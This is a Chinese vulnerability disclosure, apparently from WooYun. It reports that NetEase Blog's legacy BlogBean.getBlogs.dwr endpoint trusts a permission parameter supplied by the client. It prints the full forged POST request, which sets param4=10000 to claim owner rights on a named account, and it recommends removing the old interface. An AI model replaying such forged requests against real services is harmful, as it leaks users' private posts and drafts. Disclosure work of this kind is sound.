简要描述:该 漏洞 可造成用户博客中 加密 日志(好友可见、私人可见)以及日志草稿泄露。 详细说明:网易博客日志模块的AJAX请求接口通过URL参数传递用户等级(访客、好友、博主),并且不会对该参数进行判断,通过伪造请求即刻得到原本只有好友可见或者博主私人可见的日志。而且任何情况下该接口都会返回以草稿保存的日志,仅通过前端判断不予显示。 漏洞证明:以博客小管(http://blog.163测试数据/blog_admin)为例。通过其首页可得其的UID:721279。 向以下地址发起HTTP POST请求: http://api.blog.163测试数据/dwr/call/plaincall/BlogBean.getBlogs.dwr POST参数: callCount=1 scriptSessionId=${scriptSessionId}187 c0-scriptName=BlogBean c0-methodName=getBlogs c0-id=0 c0-param0:number=260 c0-param1:number=20 c0-param2:number=721279 c0-param3:boolean=false c0-param4:number=10000 c0-param5:boolean=false c0-param6:boolean=false batchId=687303 其中param0和param1分别是数量和起始点(这里只获取第260-280篇日志),param2是UID,param4是权限,10000代表博主(最高级)。 返回的是JSONP封装的数据,简单解析后可以发现其中有一篇在日志列表中不会出现的标题(title)为《贴出真实,秀出精彩-博客自拍之星》的日志,它的地址是http://blog.163测试数据/blog_admin/blog/static/72127920072276191481,allowView:10000表示它是博主私人可见,content即为该日志的内容。 修复方案:BlogBean.getBlogs.dwr是旧版博客里的AJAX接口,新版已经升级为BlogBeanNew.getBlogs.dwr且没有此漏洞。建议删除旧版接口。 作者 XiNGRZ@乌云
查看更多关于网易博客权限检查不严致博客中加密日志及草稿的详细内容...